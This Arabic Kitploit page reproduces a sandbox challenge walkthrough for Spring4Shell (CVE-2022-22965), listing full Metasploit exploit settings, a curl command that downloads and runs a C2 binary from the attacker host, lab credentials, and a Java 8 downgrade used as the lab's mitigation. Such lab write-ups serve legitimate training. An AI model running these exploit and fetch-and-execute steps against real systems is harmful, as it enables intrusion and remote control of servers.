Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/felisha-elmer/sandbox-challenge-spring4shell-cve-2022-22965-
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالقيادة والسيطرةالتعلم والتعليمالفريق الأحمرمختبرات وتدريب عملي
GitHubfelisha-elmer/sandbox-challenge-spring4shell-cve-2022-22965-

Sandbox-Challenge-Spring4Shell-CVE-2022-22965-

دليل خطوة بخطوة لاستغلال CVE-2022-22965 (Spring4Shell) باستخدام Metasploit، ونشر مستمع C2، وتخفيف الثغرة عن طريق خفض الإصدار إلى Java 8 على خادم Tomcat.

عرض المستودع
16منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

صندوق رمل تهديد Spring4Shell (CVE-2022-22965)

نظرة عامة

يوثق هذا الدليل إتمام تحدي صندوق الرمل الذي يركز على CVE-2022-22965، المعروف باسم Spring4Shell — وهي ثغرة تنفيذ تعليمات برمجية عن بُعد حرجة (CVSS 9.8/10) تؤثر على إصدارات معينة من إطار عمل Spring Java. يغطي التحدي كلاً من المنظور الهجومي (الفريق الأحمر) والمنظور الدفاعي (الفريق الأزرق) للثغرة.

ملاحظة: تعكس الأوامر ومسارات الملفات في هذا الدليل البيئة المحددة المستخدمة خلال هذه المحاولة. قد تختلف بيئتك — قم بتعديل المسارات وعناوين IP وأسماء الملفات وفقًا لذلك.


البيئة

الجهازعنوان IPالدور
Security-Desk (Kali Linux)172.16.200.12جهاز هجوم وعمل
الهدف الأحمر (Linux)172.16.100.90هدف الاستغلال
الهدف الأزرق (Linux)172.16.100.100هدف التعزيز

بيانات الاعتماد: playerone / password123


هدف الفريق الأحمر: نشر مستمع C2 على الهدف الأحمر

الخطوة 1 — تحديد الهدف

تم مراجعة علامة تبويب خريطة الشبكة في لوحة التحدي لتأكيد عنوان IP للهدف الأحمر (172.16.100.90). تم استخدام curl لفحص تطبيق الويب الذي يعمل على المنفذ 80:

root@kitploit:~
curl http://172.16.100.90

كشف الإخراج عن Apache Tomcat 9.0.59 مع إعادة توجيه إلى /dasmsp. تم تصفح مصدر الصفحة لتحديد نقطة نهاية نموذج POST عند /dasmsp/contact.

الخطوة 2 — تشغيل Metasploit وتكوين الاستغلال

root@kitploit:~
msfconsole
root@kitploit:~
use exploit/multi/http/spring_framework_rce_spring4shell
set RHOSTS 172.16.100.90
set LHOST 172.16.200.12
set RPORT 80
set TARGETURI /dasmsp/contact
set PAYLOAD_PATH webapps/ROOT
set HTTP_METHOD POST
set ForceExploit true
run

نجح الاستغلال في إنشاء شل JSP، وتعديل محمل الفئات، ومسح ملف السجل، وفتح جلسة شل أوامر على الهدف الأحمر.

الخطوة 3 — الحصول على شل تفاعلي

بعد فتح الجلسة، تم إدخال shell للترقية إلى شل تفاعلي. حدد Metasploit موقع /usr/bin/script على الهدف واستخدمه لإظهار شل تفاعلي كمستخدم tomcat.

الخطوة 4 — نقل وتنفيذ deploy_c2

كان الثنائي deploy_c2 موجودًا على Security-Desk، وليس على الهدف الأحمر. تم استضافته عبر خادم HTTP Python3 على Security-Desk:

root@kitploit:~
cd /home/playerone/Desktop/Resources/
python3 -m http.server 8080

تم تنزيله وتنفيذه من داخل جلسة شل الهدف الأحمر:

root@kitploit:~
curl http://172.16.200.12:8080/deploy_c2 -o /tmp/deploy_c2
chmod +x /tmp/deploy_c2
/tmp/deploy_c2

أكد الإخراج: Done! — تم نشر مستمع C2 بنجاح على الهدف الأحمر.


هدف الفريق الأزرق: تخفيف CVE-2022-22965 على الهدف الأزرق (الرجوع إلى Java 8)

الخطوة 1 — SSH إلى الهدف الأزرق

root@kitploit:~
ssh [email protected]

كلمة المرور: password123

الخطوة 2 — نقل حزم Java 8 إلى الهدف الأزرق

كانت حزم Java 8 .deb موجودة على Security-Desk في /home/playerone/Desktop/Resources/. تم نقلها إلى الهدف الأزرق باستخدام SCP من طرفية Security-Desk:

root@kitploit:~
scp /home/playerone/Desktop/Resources/*.deb [email protected]:/tmp/

الحزم المنقولة:

  • adoptium-ca-certificates_1.0.2-1_all.deb
  • fonts-dejavu_2.37-6_all.deb
  • p11-kit-modules_0.24.1-2_amd64.deb
  • p11-kit_0.24.1-2_amd64.deb
  • temurin-8-jdk_8.0.402.0.0+6_amd64.deb

الخطوة 3 — تثبيت حزم Java 8

في جلسة SSH للهدف الأزرق:

root@kitploit:~
sudo dpkg -i /tmp/*.deb

الخطوة 4 — تعيين Java 8 كافتراضي (حل لمشكلة معروفة)

بسبب مشكلة معروفة في التحدي، لا يتم تسجيل الفحص بشكل صحيح دون تعيين Java 8 كافتراضي يدويًا:

root@kitploit:~
sudo update-alternatives --config java

تم تحديد الخيار 2 — /usr/lib/jvm/temurin-8-jdk-amd64/bin/java.

الخطوة 5 — تحديث خدمة Tomcat لاستخدام Java 8

تم فحص ملف وحدة خدمة Tomcat:

root@kitploit:~
cat /etc/systemd/system/tomcat.service

تم تحرير الملف لتحديث متغير البيئة JAVA_HOME:

root@kitploit:~
sudo nano /etc/systemd/system/tomcat.service

تم التغيير من:

root@kitploit:~
Environment="JAVA_HOME=/usr"

إلى:

root@kitploit:~
Environment="JAVA_HOME=/usr/lib/jvm/temurin-8-jdk-amd64"

الخطوة 6 — إعادة التحميل وإعادة تشغيل Tomcat

root@kitploit:~
sudo systemctl daemon-reload
sudo systemctl restart tomcat

تحول فحص تخفيف CVE-2022-22965 على الهدف الأزرق إلى اللون الأخضر في لوحة التحدي.


الأدوات المستخدمة

  • Metasploit Framework (وحدة spring_framework_rce_spring4shell)
  • curl
  • خادم HTTP Python3
  • SSH / SCP
  • dpkg
  • systemctl
  • update-alternatives
  • nano
تنزيل الأداة